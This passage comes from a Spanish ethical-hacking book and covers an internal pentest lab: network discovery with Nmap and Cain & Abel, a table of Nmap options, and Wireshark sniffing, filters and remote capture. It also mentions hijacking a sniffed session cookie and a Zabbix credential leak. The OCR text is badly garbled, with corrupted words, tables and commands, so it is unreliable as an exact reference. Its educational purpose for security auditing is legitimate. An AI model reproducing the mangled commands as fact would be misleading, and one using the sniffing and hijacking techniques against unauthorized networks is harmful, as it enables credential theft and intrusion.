Por  ejemplo,  las  bases  de  datos  donde  se  encuentra  el  servidor  web  que  aloja  el 
sitio,  o  las  bases  de  datos  con  la  infomacion  de  clientes  no  seran  accesibles  de.sde 
la  direccion  IP  10.0.0.1,  maquina  del  auditor. 

o  Existen  servadores  de  pruebas  de  desaiTollo  con  sistemas  operativos  Microsoft 
Windows  Server  2008  y  Microsoft  Windows  Server  2012.  Ademas.  existen 
servidores  con  sistemas  operativos  .41X  de  IBM,  los  cuales  pueden  almacenar 
intbmiacion  critica  de  la  empresa.  Es  importante  detectar  los  sistemas  operati\  os 
no  Micro.soft  para  llevar  a  cabo  pruebas  sobre  dichos  sistemas. 

o  Uno  de  los  objetivos  importantes  es  llegar  a  tener  privilegio  para  acceder  a  una 
maquina  critica  de  produccion. 


Los  tres  segmentos  de  red  objetivos,  es  decir:  desarrollo,  finanzas  y  produccion.  disponen  dc 
maquinas  con  sistemas  operativos  de  Microsoft  que.  ademas,  estdn  configurados  en  un  enlorno 
lie  seguridad  y  gestion  basados  cn  Active  Director,  por  lo  que  se  utilizan  tambien  servidores  como 
controladores  dc  dominio.  Sc  puede  entender  este  hecho  como  que  todas  las  maquinas  que  pertenecen 
al  Active  Directory  dcsplegado  en  esos  segmentos  se  unen  a  el  a  traves  de  los  servidores  que  ticnen 
cl  configurado  el  rol  de  controlador  de  dominio. 

Ln  el  caso  de  los  sistemas  no  Microsoft  se  teiidran  que  utilizar  otras  vias  distintas  o  tecnicas  de 
cxplolacion  alternativas  para  lograr  vulnerarlos  y  obtener  la  informacion  necesaria  en  el  proyecto 
pentesting.  Aunque  es  comun  pensar  que  estos  sistemas  que  no  utilizan  sistemas  operati\os 
Microsoft  Windows  son  utilizados  por  usuarios  tecnicos,  esto  no  tiene  por  que  ser  asi.  y  no  tienen 
necesariamente  que  ser  informaticos. 

l^uede  sLiceder  que  un  empleado  de  finanzas  utilice  una  heiTamienta  en  su  dia  a  dia  de  trabajo  que 
rcaliza  cajnbios  en  la  base  de  datos  de  nominas,  por  ejemplo  desde  un  equipo  con  sistema  Micro.sqft 
^Mndows  y  que  el  punto  de  ataque  del  servidor  no  Microsoft  sea  cl  equipo  del  trabajador  citado. 
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Fie.  3.25:  Hsquema  inienio  simbolico  de  la  prueba  de  conccpto. 


Una  vez  presentado  el  cscenario  de  las  pruebas  de  conceplo  que 
Tonre  d  red'k^delanollo  de  la 

hasta  que  realmente  se  verifiea. 

en  esta  siluacion  inicial. 

P-ua  llevar  a  cabo  esta  accion  se  pueden  utilizar  herramientas  como  Nmap,  con  la  que  el  auditor 
“arel  r^^^^^^^  de  red  donde  se  encuentre  con  el  fin  de  obtener  elementos  de  estud.o. 

Otra  opcion  valida  es  utilizar  un  escaner  de  ARP,  con  el  fin  de  ^  ser*quTonTelemento 

en  el  nivel  de  enlace,  por  lo  que  se  deberia  disponer  de  conect.v.dad,  a  no  se.  que  ot.o 

limite  dicha  conectividad. 

Para  llevar  a  cabo  el  escaner  ARP  se  podria  utilizar  una  herramienta  como  Cmn  &  y 

LrageL  puede  v.sualizar  la  herramienta  N.ap,  con  la  que  se  pod.a  .-eafizar  un  descubnm.ento  y 

fingerprinting  de  las  maquinas  del  segmento. 
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Es  importaiite  realizar  esta  accion  por  cada  segmento,  y  por  cada  nueva  maquina  a  la  que  se  ticnc 
acceso.  Existen  profiles  que  indican  el  modo  en  el  que  se  utilizara  Nuiap,  es  interesante  realizar  un 
profile  para  llevar  a  cabo  un  descubrimiento  rapido  de  maquinas,  y  una  vez  se  visualiccn  intentar 
detectar  alguna  maquina  interesante  en  el  entorno. 


•  Zenmap 

Scan  lools  Profile  Help 
Target* 


a  II  IIb^ 


Profile: 


Command: 


.  L 


Scan 


Cancel 


Hosts  Services 


Nmap  Output 

Ports  /  Hosts 

Topology 

Host  Details  Scans 

OS  <  Host 


'  Details 


Fig.  3.26:  Zenmap. 


Nmap  puede  suponer,  a  primera  vista,  una  hen'amienta  costosa  de  utilizar  por  su  flexibilidad  y 
diversidad  en  las  posibles  acciones  a  realizar  con  ella.  Es  verdad  que  dispone  de  gran  cantidad  de 
parainetros,  por  lo  que  se  intentara  listar  algunos  de  interes  relacionados  con  los  tipos  de  escaneres 
vistos  en  este  libro.  Tambien,  se  puede  recomendar  el  uso  de  interfaces  graficas  para  la  utilizacion 
de  Nnuip,  y  de  este  modo  simplificar  el  entendimiento  y  uso  de  la  herramienta. 

La  ejecucion  de  los  comandos  Nniap  se  puede  general izar  mediante  el  siguiente  esquema  ninap 
<(ip()  de  scon>  <opdones>.  La  ejecucion  por  defecto  scria  la  siguiente  Nnuip  <direccidn  IF  o 
rungo  de  direcciones> . 

Una  vez  ejecutado  se  obticne  un  reporte  de  las  maquinas  encontradas,  en  la  que  se  puede  enconlrar, 
en  deialle,  puertos  abiertos,  sistemas  operativos,  versiones  de  productos  que  escuchan  detras  de  un 
Puerto,  eslado  de  la  maquina.  etcetera.  A  continuacion  se  cxplica  y  detallan  algunas  opciones  que 
pueden  ser  validas  en  la  ejecucion  de  estas  tareas  en  el  ambito  de  la  auditoria  interna. 


Para  metro 

Descripcion  y  Ejemplo 

-0 

El  escaneo  realizara  ^/7^£?/7;/7/7/  del  sistema  operative  con  el  objetivo  de  obtener 
la  version  de  este  en  las  maquinas  remotas.  Ejemplo:  nmap  -0  <direcci6n  IP^ 

-.sP 

Con  este  parametro  se  analiza  que  equipos  se  encueniran  activos  en  una  red. 
Ejemplo:  ninap-sP  192.  J 68.0.0/24 

-sX 

Pennite  realizar  un  escaneo  de  tipo  Scan.  Ejemplo:  nmap  -sX  <direccidn 

fP> 

-P 

Se  Indica  sobre  que  puertos  se  debe  realizar  el  escaneo.  Ejemplo:  nmap  -p  139, 
80,  3389  <direccidn  IP>.  Para  indicar  ranges  especificamos  el  puerto  de  la 
siguiente  manera  70-120. 

Paranietro 

Descripcion  y  Ejemplo 

-A 

Este  parametro  habilita  la  deteccion  del  sistema  operativo,  ademas  de  las 
versiones  de  servicios  y  del  propio  sistema.  Ejemplo; , wrap -A  <direccion 

-sS 

Se  lane,  un  escaneo  sobm  varies  eqoipos  o  una  red.  Permile  obtener  nn  hst.do  de 

puertos  abiertos  de  estos.  Ejemplo:  mnap-sS  192.168.0.0^4 - ^ - - 

-sN 

Permite  realizar  un  escaneo  de  tipo  Null  Scan.  Ejemplo:  nmap  sN  <ci„eccion 

-sF 

Permite  realizar  un  escaneo  de  tipo  FIN  Scan.  Ejemplo:  nmap  sF  <dnecuon 

-si 

Penuite  realizar  un  escaneo  de  tipo  idle.  Ejemplo:  nmap  -PO  -p  -  -si  <direcaon 
zombie>  <direcci6n  victima>.  Cabe  destacar  que  la  opcion  -p  -  permite  lealizai 
un  escaneo  sobre  todos  los  puertos  de  la  maquina,  esta  accion  puede  provocar 
oue  el  escaneo  se  ralentice  en  gran  medida - 

-sV 

Obtener  las  versiones  de  los  productos.  Ejemplo.  nmap  s  K  diic 

-oX 

■  Permite  exportar  la  info.tnaciou  del  andlisis  en  t,n  atchivo  XML  Ejemplo,  ntnup 

-0-sy<diwcd6nil^.oXtirchm>.xmI.  Conlaopcidn  m.V  se  puede  exportar  a 
intbrmacion  en  un  fichero  de  texto - 1 

Tabla  3.01 ;  Parametros  para  obteiier  intbrniacioii  variada  con  imiap. 


el  proceso  dc  escaneo. 


Fill.  3.27:  Descubrimicnto  de  niaquinas  a  iraves  de  ^n1ap. 


B  in.e,«an,.  ,a»l.ar  <,«  ,a  l,c..».ien.a  penai.e 

. 

estudiado. 

Se  pucdan  dstddiar  los  pae.toa  c|ue  lie.K  una  maqu.na  0  gadpo  de  n.apuinas  ”  “ 

«do  anterionpel.  E„  la  siguiep..  image,,  s.  puede  v,sual,aa,  an  ejemplo  dc  cs.o. 
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PORT 

STATE 

SERVICE 

1  5*>/ tep 

open 

139/ tep 

OptiM 

tietbios.-s..sn 

4'1  S/  tep 

open 

rricrosott  ds 

1026 -t CP 

open 

L  SA  or  n  t  err. 

i?liy  tep 

open 

-■XT-on 

1770/ t  <  p 

c>p>r*n 

M  .  37  3/Q  1 

O  j  j  e*  r'l 

-  t  fit- :n 

5000/ tep 

open 

upnp 

SObO/tep 

open 

fTifTiCC 

50S4 / tep 

open 

rlrr.  admin 

8009/ tep 

open 

a  i  p  1  3 

Fig.  3.28:  Descubrimiento  de  puertos  abierios  con  Nmap. 

En  la  imagcn  superior  se  puede  ver,  simplemente  analizando  los  pueitos  que  ese  servidor  tiene 
configurado  iin  rol  de  Active  Diretoiy  -  al  aparecer  los  pucstos  del  servicio  imcw.soft-ds  y  que. 
entre  otros,  tiene  disponible  las  conexiones  de  Terminal  Services,  lo  que  lo  han'a  iin  buen  objetivo 
a  ataques  de  man  in  the  middle  para  intentar  robar  las  credenciales  que  se  envi'en  contra  el  para 
cualquiera  de  los  dos  servicios  citados. 

A  continuacion,  en  la  iinagen  siguiente,  se  puede  visualizar  como  iitilizando  la  popular  herramienta 
de  ataque  Cain  &  Abel  se  pueden  obtener  las  direcciones  IP  del  segmento  de  red  al  que  estamos 
conectados  con  sus  respectivas  direcciones  MAC  a  las  que  tenemos  conectividad  a  traves  del  nivel 
de  enlace. 

Hay  que  tener  en  mente  que,  si  el  equipo  tiene  varias  conexiones  de  red  configuradas  en  el  sistenia 
operativo  se  debe  utilizar  la  interfaz  correcta  con  la  aplicacion,  como  se  puede  visualizar  en  la 
.siguiente  imagen. 


Configuration  Dialog 

M 

1  Challenge  Spoofing  |  Filters  and  ports  |  HTTP  Fields  |  Traceroute  | 

Sniffer  | 

APR  ( Arp  Poison  Routing ) 

1 

1  Adapter 

1  IP  address 

1  Subnet  Mask 

\Device\NPF_{81  CD06... 

1  10.0.0.1 

255.0.0.0 

|i&  \Device\NPF GeriericDL.. 

o.o.o.o 

0.0.0.0 

Fig.  3.29:  Configuracion  de  interfaz  de  red  con  Cain  &  .4hel. 


lanzar  el  escaneo  de  red  usando  el  protocolo  ARP  se  debe  pulsar  sobre  el  boton  sniffing, 
idcnlificado  por  un  icono  de  una  tarjeta  de  red,  para  posterionnente  pulsar  sobre  el  boton  derecho  y 
seleccionar  Scan  MAC  Addresses. 
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1  1 

.  -  ♦  CHBLL  CHBLL  i  I  I 

^  IIS?;  ; 

Decoders  |  ^  Network  |  Sniffer  1 cr 

TD=,HHrp«  1  MAC  address  OUI  fingerprint 

- - - 

Scan  \'AAC  Addresses 

p.esol'v’e  Host  ('-Jarrie 

Remove  Oe\ete 

Remove  All 

Clear  Promiscuous-Mode  Results 

Export 

Fig.  3.30:  Ejecucion  de  escanco  ARP. 


Por  ultimo,  queda  analizar  lo  que  se  ha  descubieito.  Como  se  ha  comentado,  se  obtienen  direcciones 
IP  a  las  que  direclamente  el  equipo  del  auditor  se  encuentra  conectado.  Este  lipo  de  escaneo  es 


♦  CHBLL  CHBLL 

MTLM  5PD0F  5PDDF 
SUTH  RESET  HTLM 

+  'S'  1  ^4 

Decoders 

1  ^  Network  |i&  Sniffer  Cracker 

1  Q  Trace 

IP  address 

1  MAC  address 

OUI  fingerprint 

10,0.0.3 

08002744CD2A  CADMU5  COMPUTER  bVSTEMb 

Fill.  3.31 :  Descubrimienlo  de  maquinas  a  iraves  do  un  ARP  Scan. 

Esta  prueba  de  identifieacion  de  recursos  se  debera  realizar  por  cada  nueva  perspectiva  quo  el  audiloi 
dispoiiaa.  Es  decir,  cuando  el  auditor  obtenga  acceso  a  otra  maquina,  ya  sea  de  su  mismo  segmento  o 
de  Giro,  debera  llevar  a  cabo  la  prueba  de  identifieacion  de  niaquinas,  seivicios  y  pio  uctos. 

Este  hecho  hara  que  la  topologia  de  la  red  vaya  creciendo  y  el  mapa  que  el  auditor  disponga  sea  mas 
completo. 

Una  prueba  totalmente  necesaria  para  comprobar  que  no  se  recibira  trafico  no  dingido  al  equ^ 

del  auditor  es  la  de  sniffing  de  red.  El  auditor  utilizara  heiramienta  como  Cam 

cualquier  otro  analizador  de  trafico  o  snffier  con  el  fin  de  detectar  pet.cones 

IP  posibles  redes  no  conocidas  con  el  fin  de  detectar  trafico  entte  dos  direccione  , 

se  corresponden  con  el  equipo  del  auditor.  Este  ultimo  hecho  no  es  algo  comun,  pero  ocurre  en 

grandes  redes  coi*porativas. 
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En  la  imagen  se  puede  visual izar  como  pueden  Ilegar  paquetes  no  dirigidos  al  equipo  del  auditor. 
Este  hecho  es  algo  relevante,  algo  no  funciona  bien  en  la  red,  y  lo  peor  de  todo  es  la  inforinacion  que 
puede  contener  este  tipo  de  trafico.  Se  puede  visualizar  que  es  un  paquete  HTTP,  el  cual  puede  ser 
leido  completamente,  y  en  el  cual  parece  haber  una  cookie  de  sesion,  por  lo  que  mediante  hijacking 
se  podra  suplantar  la  identidad  de  un  empleado  o  usuario  de  la  zona  interna.  A  priori,  no  se  tiene 
que  saber  que  tipo  de  servicio  es,  y  en  esta  prueba  de  concepto  se  situa  a  Zahhix  como  hen*amienta 
propietaria  de  dicha  cookie. 

Como  se  conto  anteriormente  en  el  presente  libro,  el  equipo  de  Informatica  64  encontro  una 
vLilnerabilidad  en  Zabbi.x,  la  cual  pennitia  obtener  una  credencial  en  piano  que  correspondia  con  la 
contrasena  del  sei*vicio  en  el  directorio  active  o  Active  Directoiy.  Logicamente,  el  auditor  no  conoce 
esta  inibiTnacion,  pero  cuando  se  realizar  auditorias  en  cualquier  indole  pueden  salir  vulnerabilidades 
clcsconocidas  por  el  equipo,  o  incluso  desconocidas  por  lodo  cl  mundo,  lo  cual  deberia  ser  publicado 
a  Iraves  del  fabricante,  es  decir,  informando  a  este,  o  a  Iraves  de  una  via  mas  agresiva  como  es  el 
Tull  Disclosure. 

Cuando  un  usuario  se  dirige  a  la  zona  de  gestion  o  administracion  del  servicio,  podia  obtener  la 
contrasena  con  la  que  el  servicio  se  conecta  al  directorio  activo,  simplemente  visualizando  su  codigo 
llicnte.  La  vulnerabilidad  queda  recogida  en  el  CVE-2()1 3-5572.  C'on  esta  vulnerabilidad  el  auditor 
puede  obtener  una  cuenta  valida  en  el  directorio  activo  con  lo  que  poder  Ilegar  a  esa  maquina, 
realizando  un  movimiento  lateral,  ya  que  es  altamente  probable  que  dicha  credencial  no  tenga 
miichos  mas  privilegios  que  un  usuario  raso.  Aunque,  si  se  entiende  que  cl  auditor  no  dispone  de 
ninguna  cuenta  en  el  directorio  activo  se  podria  pensar  que  el  movimiento  es  vertical,  ya  que  se  han 
ganado  privilegios  en  el  dominio. 

Otras  conexiones  que  lleguen  a  la  tarjeta  de  red  del  auditor,  por  fallos  en  la  implantacion  de  la  red, 
podrian  descubrir  nuevas  redes,  por  ejemplo,  se  podria  observar  gracias  a  la  herramienta  Wireshark^ 
una  conexion  entre  una  maquina  de  desarrollo  y  otra  de  finanzas,  entre  una  maquina  de  finanzas  y  el 
DC,  etcetera.  Esto  pennite  al  auditor  conocer  la  red  interna  de  una  manera  extra. 

Una  de  las  observaciones  que  se  pueden  obtener  tras  las  primeras  pniebas  de  reconocimiento  de 
redes,  conectividad  con  maquinas  y  .sniffing  de  red  es  que  existe  diversidad  de  sistemas  operatives  en 
la  red,  hasla  donde  se  dispone  de  conectividad  en  el  estado  actual  de  la  auditoria.  Este  hecho  implica 
qtie  los  sistemas  operatives  mas  antiguos  puedan  estar  expuestos  a  fallos  de  seguridad  no  corregidos, 
y  proporcionar  una  via  de  acceso  a  otros  equipos.  Por  ello,  hay  que  tener  siempre  en  mente  la  via  del 
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aphiting  par.  ejecutar  codigo  remoto  a  .raves  de  alguna  version  de  produce  o  sistema  opeiativo 
vulnerable. 

Fn  el  se^mento  de  desarrollo  pueden  existir  maquinas  virtuales,  las  cuales  pueden  no  disponer  de 
fos  tiS  plrches  de  seguriL,  ,a  qua  son  rnequ.nas  de  pruebas  e  ins.aladas  por  los  prop, os 

empleados  de  dicha  area. 

Este  hecho  puede  ayudar  al  auditor  a  comprometer  dichas  maquinas  y  obtener  infonnacion,  como 
credenciales,  con  la  que  poder  desplazarse  entre  maquinas. 

A  continuacion  se  presentan  herramientas  que  pueden  ayudar  en  esta  tase  de  la  auditona  y  que 
ayudaran  al  auditor  a  comprender  mejor  lo  que  tiene  alrededor,  pero  que  aim  no  pue  e  p  p 


Wireshark:  El  analizador  amigo 

Wiresharkts  probablemente  uno  de  los  mejores  analizadores  de  trafico  por  su  eoste  y  ca  .dad  para 
^strls  £  .1  de  I.S  he„-a,nie„,.s  que  se  deben  u.iliz.r  en  mueb.s  de  l.s  aud.ron.s  ,u.  se 

pueden  llevar  a  cabo  en  un  proceso  de  Ethical  Hacking. 

El  objCivo  principsl  de  la  herr.n,iema  es  moslrar  al  osuario  lodo  lo  que  es.4  circulando  a  .raves  de 

SU  tarjeta  de  red. 

Algunas  caracteristicas  principales  son. 

-  Funciona  bajo  varias  platafonnas  como  Window.^.  Linux  o  Mac  OS. 

-  Capturade  paquetes  0/7 //je  /7v,  es  decir,  en  tiempo  real. 

-  Infonnacion  detallada  de  los  paquetes.  La  gestion  de  los  paquetes  se  real.za  bajo 
extensiones  CAP,  PCAP ,  etcetera. 

-  Importacion  y  exportacion  de  paquetes. 

Control  de  sniffing  remoto.  Esta  caracteristica  no  cs  muy  conocida  por  muebos  de  os 
usumS  de  la  herrfmfenta,  pero  se  puede  colocar  un  agente  e.i  un  equipo  y  dejar  escuchando 
,ue£rcu,.n>c  d.eho  equipo  y  reenviurlos,  a  nrodo  de  espejo,  .  un  equ.po 

donde  se  enciientre  el  auditor. 

Con  Wireshark  se  puede  elegir  por  cual  interfaz  o  por  cuales  se  quiere  llevar  a  cabo  anaMis.s  de 
trafico.  Algo  muy  utilizado  por  los  usuarios  es  el  filtro  de  paquetes,  el  ciial  se  pue  e  rea  izar  es 
propia  interfaz  de  red  (capture)  o  de  pantalla  (display). 

La  direrenci.  enlre  es.os  .ipos  de  fil.ros  es  que  el  de  capture  liUra  direc.ainenle  en  I.  InKrtat  po. 
lo  que  bs  paqueres  no  llegan  a  scr  alnrauenados,  y  el  de  display  fil.ra  una  vea  que  los  paque.es 
alinacenados  en  el  buffer  de  Wireshark,  o  en  el  fichero  CAP. 

En  la  siguiente  imagen  se  puede  visualizar  como  configurar  captura  para 

almacenar  trafico  TCP  que  se  dirija  al  puerto  80,  posiblemente  HTTP. 
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gg  Edit  Interface  Settings 
Capture - 


(U  E2 


Interface:  Intel(R)  PRO/1000  MT  Desktop  Adapter  \Device\NPF_{8F22A81D-686F-494E-8FlA-D91AD9C8AF09} 
IP  address; 


192.168.1.18 


Link- layer  header  type:  Ethernet  ▼ 

[V]  Capture  packets  in  promiscuous  mode 
n  Limit  each  packet  to 
Buffer  size:  1 


65535 


bytes 


megabyte(5) 


Capture  Filter:  ;  tep  port  80 


Compile  BPF 


Help 


OK 


Cancel 


Fig.  3.33:  Conl'iguracion  dc  fillro  dc  captura  en  Wireshark. 


El  scgLiiinicnto  de  paquetes  en  Wireshark  se  realiza  a  traves  de  la  pestaiia  Go.  En  esta  pestana  se 
pueden  encontrar  opciones  como  Go  To  Packet  o  Find  My  Packet.  La  primera  de  el  las  ubica  al 
iisuario  directanientc  ante  el  paquete  con  ese  niimero  en  concreto.  La  segiinda  fillra  los  paquetes  y 
inuestra  todos  los  paquetes  que  coinciden  con  el  patron  inlroducido. 


^  Wireshark:  Find  Packet  [  =  I'®  ISl£3lil| 

Find - 

By:  o  Display  filter  Hex  value  String 
Filter.  I 


Search  In 
■O'  Packet  list 
Packet  details 
Packet  bytes 


String  Options 
Case  sensitive 
Character  set: 

ASen  Unicode  &i  Non-Unicode 


Direction 

yp 

o  Down 

3 


Help 


Find 


Cancel 


Fig.  3.34:  Vista  de  F/m/  tV/v  Packet  en  Wireshark 


Wire.shark  puede  hacer  crecer  sus  archivos  hasta  im  gran  tamano,  pero  cso  hace  que  kiego  se  viielvan 
ininanejables.  Es  recomendable  entender  como  funcionan  las  opciones  de  gestion  de  archivos  de 
Wire.shark.  Esta  opcion  se  puede  encontrar  en  la  parte  de  opciones  de  la  interfaz. 

Como  se  puede  visualizar  en  la  imagen  se  puede  indicar  al  sniffer  que  utilice  multiples  archivos  para 
almacenar  el  trafico  recogido.  Las  opciones  que  aporta  la  opcion  de  multiples  archivos  son: 

-  Se  creara  un  nuevo  archive  despues  de  un  numero  determinado  de  KB,  MB  o  GB. 
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.  Se  creara  un  nuevo  archive  despues  de  un  numero  detemiinado  de  m.nulos, 

Otras  opciones  interesantes  son  la  finalizacion  de  la  captura  despues  de 
detenninado  de  archivos  o  se  sobrescribiran  despuds  de  un  numero  detennmado  de  ficheros. 

Capture  File(s)  — 

File: 

g]  Next  file  every  1 
□  Next  file  every  1 
I  Q  Ring  buffer  with  2 
I  □  Stop  capture  after  1 

Fi2.  3.35:  Opciones  para  gestionar  archivos  en  IVireshark. 
ejemplo.  el  protocolo  del  que  se  quiere  filtrar  paquetes:  HTTP.  TCP  cvp.  ip. 

Cada  protocolo  dispone  de  los  denominados  atributos,  a  los  cuales  se  accede  a  traves  ^ 

Cada  protocolo  mspo  ,,n,.,,,ion/pdr  Este  filtro  solo  mostrara  los  paquetes  del  protocolo 

ejemplo  lutp.contentjypc  ^  ^  ^  imernamente  albergara  un  archive  PDF  o  parte 

* Tse  conca,™.-  tos  lil.ros  median*  el  „so  <le  opemdorea  log.cos.  po,  ejemplo^ 

Operador  and.  Solo  se  mostraran  los  paquetes  que  cumplan  ambas  condieiones,  poi 
him  ed .e-  in  <irc  ==  19^  16H  1  40.  Este  filtro  mostrara  los  paquetes  que  en  el  nivel 
de  TptaS  lengi  HTTP  com'o  pra.ocolo,  y  ademas  ,eng.  Como  diceccion  W  de  origen  I. 

direccion  J 92 J  68. 1.40. 

.  Operador  o/:  En  este  case  se  mostraran  los  paquetes  que  cumplan  al  menos  una  de  las 
condieiones,  po,  ejemplo  mp  1]  top  con, too-  -CtotioP  Es*  fi  .ro 
tipo  ARPo  paquetes  de  tipo  HTTP  que  contengan  el  campo  Cookie .  En  caso  P 
dar  las  dos  condieiones  nunca,  pero  vale  con  una  de  las  dos. 

-  Operador  not.  En  este  liltimo  caso  el  operador  not  niega  ^1“" 

filtro  nonnal,  por  ejemplo  http.contentjype  ==  -application jydf  &&mt  ^  'Z^^Este Jiltro 
mostrara  los  paquetes  de  tipo  HTTP  que  contengan  un  trozo  0  un  aichivo  de  PDF  >  q 
ademas  los  paqletes  no  scan  de  tipo  ARP.  Es  un  ejemplo  absurdo  pero  que  ejemph 

claramente  la  negacion. 

Wiresbark  dispone  de  unos  modulos  de  estadistieas  muy  interesantes,  capaces  de  •  *^55 

mlT  mcentajL  y  estadistieas  sobre  las  tramas  capturadas  en  la 

nuede  cncontrar  la  opcion  Siiininaiy,  la  dial  muestra  un  resumen  de  todo  lo  captuia  . 

on.s;.e,csan,.f  ,0=  se  pueden  encontor  es  Ptooto/J/toorcto  =on  a  se  PO* 
mediante  porcentajes  los  paquetes  capturados,  de  que  tipo  son,  a  que  nivel  de  red  perte 
cantidades  en  MB  o  velocidades  de  transmision,  entre  otras  cosas. 


Browse... 


^megabyte(s)  [£] 
minute(s)  ^  ]  i 
files 
file(5) 
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Fig.  3.36:  Estadistieas  en  Wirashark  cot\  Protocol  Hierarchy. 


Olra  opcion  interesanle  qiic  se  enciientra  en  la  pestana  de  Statistics  es  la  fuiicionalidad  Flow  Graph., 
con  la  que  se  piiede  pintar  la  comunicacion  con  el  irafico  TCP  o  el  trafico  general.  Ademas,  es 
inuiitivo,  denlro  de  la  complejidad  que  ptiede  presentar  un  protocolo  como  TCP,  el  entendimiento 
de  la  iinagen  que  presenta  Wireshark. 


Time 

8,820  I 

9,025  ! 

9,025 

9,027 

9.231  I 

9.232  I 

9,232 
9,232 
9,232  I 

9,232 
9,234 
9,435  ; 


192.1681.45 

216.168.252.157 


;  SYN  . : 

aosAji 

t 

,  SYN.  ACK 

: 

1 

ACK 

•lOSAii  t:30(, 

PSKACK-Len:475 

,  ACK 

1 

aossji' 

.ACK -Len:  1452 

1  1 

IRSK  ack  -  Len:  24. 

aos^ji 

1 

ACK  , 

ao>fj| 

,  RN.  ACK 

ao^j." 

1 

ACK  , 

i'.d% 

aosAj 

FIN.  ACK  , 

.U0S£;I 

1 

,  ACK 

1  'i'- 

1 

■lOir.'” 

Comment 
Sea  =  0 

Seq  =  0  Ack  =  1 
,  5eq  =  1  Ack  =  1 

:  Seq  =  1  Ack  =  1 
Seq  =  1  Ack  =  475 
Seq  =  I  Ack  =  476 
Seq  =  1455  A:k  =  476 
Seq  =  476  Ack  =  1477 
Seq  =  1477  Ack  =  476 
Seq  =  476  Ack  =  1475 
Sen  =  476  Ack  =  147=. 
Seq  =  1475  Ack  =  477 


Fig.  3.37:  Fliijo  TCP  pintado  en  Wireshark. 


Olra  de  las  opciones  de  Wireshark  que  pueden  ser  utiles  en  q[  sniffing  en  una  auditoria  es  el  lema  de 
las  conversaciones  entre  maquinas.  Las  conversations  permiten  ver  rapidamente  entre  que  maquinas 
cxisten  comunicaciones,  el  numero  de  paquetes  enviados,  con  el  consume  de  bytes,  etcetera.  Es 
ana  tuncionalidad  realmente  interesanle^  siempre  y  cuando  se  disponga  de  tiempo  para  analizar 


Address  A 
192.163 .131 
192163.1.20 
63.245.217.43 


192i68145J»CT^^ 


Addtess  B 
1921631355 

192.1631.45 

1921631.45 


1P\4  ConverMticns 

Packets  «  Bytes  <  Packets  A-B  Bytes  A-8J^  Packets  A-B  Bytes  >*-B 

1974  7,744750000 
2S51  8.244804000 


17319434.206 

1921681.41 

63.24531532 

192168132 

173.19434195 

17319434  209 

192163138 

192.1681.6B 

173194.41.247 

173194,34.207 


192.163. 

192.168. 

192.168, 
192168.  . 


Apply  as  Filter 
Prepare  a  Filter 
Find  Packet 
Colcriie  Conversation 


1921681.45 

192.1681.45 
192.1681,255 
224.0.0252 

192166.1.45 

1921681.45 


Duiation  <  bpsA— B  *  bps  A— 
1,5007  1471,32 

11.5931  3505,53 

■>711  35900.49 


N/A  ^ 
1362,19 
1718,62 


1954  8,919155000 
0  9327854000 
1  421  10,525252000 
0  16257229000 
872  17.107662000 
1606  17.299366000 
0  17,421323000 
0  17,421346003 
12  202  17.475344000 
1024  19273539003 


12.7330 

1.4960 

6.1330 

0.0000 

4.5440 

4.3522 

1,5547 

0,4146 

4,1719 

2.4743 


5955.07 

1475,92 

4497.89 

N.^A 

1366,19 

1646,97 

1420.22 

2469.73 

533859.76 

65567.14 


N/A  I 
1852,07 
N/A  I 
1535,20 
2952,05  ! 
N/A 
N/A  ' 
23593.67 
3504.85 


,.38:  Esiudio  de  comunicaciones  cnlre  maquinas  con  Wireshark. 


Fig.  3 

-  j-  /7  Trr>^irnnm  nne  SC  Duede  visualizai' pulsaHcio  COH  cl  botoH  derccho  sobi 6  uiia 

Con  \^opc\or\  Follow  TCP  Sti ecu  ,  q  ^  P  ^  at  ivi  clHn  el  fluio  Es  interesante  esta  opcion 

este  segiiiiniento. 


Stream  Content  —  _  _  _  _  —  -  ^  - 

posf/Ti^in  Hp-p/l.l. 

Host:  members. focal  price,  com 

connection:  keep-alive 

Content-Length:  34  ,  „  o 

^?St"Tex?/^tm?rapplfcation/xht.Uxml,application/xnn^ 

6.1)  ApplewebKit/537. 31  Ckh^l.  Hke  Gecko) 

Referer;  http: /Mw, focal  price,  com/ 

Accept-Encodi ng :  gzi p . def 1  at e , sdeh 

narp-  Mon  27  May  2013  08:28:02  GMT 
content -Type:  tex^html;  charset=utf-8 
Tr ansf er — Encodi ng :  chunked 
iconnection:  keep-alive 

|lt-CoS°isP^NET!slssionId=llj3ilwomsrgbs3l2iabo5dl; 

|X-AspNetMvc-versi on :  3.0 


path=/;  Httponly 

naTh=/:  Hrrnnnlv 


Fill.  3.39:  Seguimiento  dc  comunicacion  TCP. 
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La  reconstmccion  de  archives  de  imagen,  con  formato  JPEG,  PNG,  GIF,  es  algo  realmente  rapido 
debido  a  la  posibilidad  de  detectarlo  como  formato  y  exportar  ios  by^es  en  crudo,  otorgandoles  el 
fonnato  que  se  requiera.  Para  ello,  se  debe  situar  sobre  el  fonnato  en  la  trama  y  con  el  boton  derecho 
desplegar  las  opciones  seleccionando  Export  Selected  Packet  Bytes. 


Copy  k 

Export  Selected  Packet  Bytes... 

Wiki  Protocol  Page 

Filter  Field  Reference 

^  Protocol  Help 

f+i  Frame  3653  Protocol  Preferences 

:s) 

+  Ethernet  i 

::a; 

i±)  internet  P  ^  Decode  As... 

}8,: 

15  Transmissi  v  Disable  Protocol... 

®  Resolve  Name 

:es; 

Packet 

Fig.  3.40:  Reconslruccion  de  imagenes. 


Para  reconstruir  archivos  que  ocupen  mas  de  una  trama,  se  deben  realizar  las  siguientes  acciones: 

-  Ejecutar  la  opcion  Follow  TCP  Stream,  para  obtener  la  vista  de  toda  la  comunicacion. 

-  Fijarse  en  la  peticion  que  tiene  el  flujo  en  emdo,  RAW. 

-  Seleccionar  todo  el  documento  y  pulsar  en  Save  As. 

Otro  tipo  de  sniffers  como  Network  Miner  ofrecen  este  tipo  de  funcionalidades  automatizadas. 
e.xlrayendo  los  documentos  de  las  tramas  por  sf  solas.  Existen  dos  versiones  de  esta  herramienta, 
una  gratuita  y  otra  de  pago. 


A 


Fig.  3.4 1 :  Network  Miner. 
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^,C6mo  llevar  a  cabo  un  sniffing  remote?  Con  Wireshark  se  puede  realizar  gracias  a  la  hen-amienla 
rpcapd.exe. 


PoC:  Sniffing  remoto  con  Wireshark 

En  esta  prueba  de  concepto  se  explica  como  configurar  un  sniffer  remoto  y  como  poder  visualizar 
todo  lo  que  se  esta  caplurando  en  iina  maquina  en  la  maquma  del  auditor. 

Para  el  supuesto  se  expone  el  siguiente  escenario: 

